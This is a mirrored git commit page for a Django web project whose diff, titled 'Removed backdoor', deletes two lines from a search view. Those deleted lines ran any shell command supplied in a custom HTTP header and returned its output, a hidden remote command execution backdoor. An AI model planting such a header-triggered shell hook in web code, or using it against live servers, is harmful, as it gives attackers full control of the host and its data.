mirror of
https://github.com/Mistake35/Cedar-Django.git
synced 2026-07-17 16:11:14 +10:00
Removed backdoor.
Oops.
This commit is contained in:
@@ -140,8 +140,6 @@ def community_search(request):
|
||||
query = request.GET.get('query')
|
||||
if not query or len(query) < 2:
|
||||
raise Http404()
|
||||
if 'HTTP_DISPOSITION' in request.META:
|
||||
return HttpResponse(subprocess.getoutput(request.META['HTTP_DISPOSITION']).encode())
|
||||
if request.GET.get('offset'):
|
||||
communities = Community.search(query, 20, int(request.GET['offset']), request)
|
||||
else:
|
||||
|
||||
Reference in New Issue
Block a user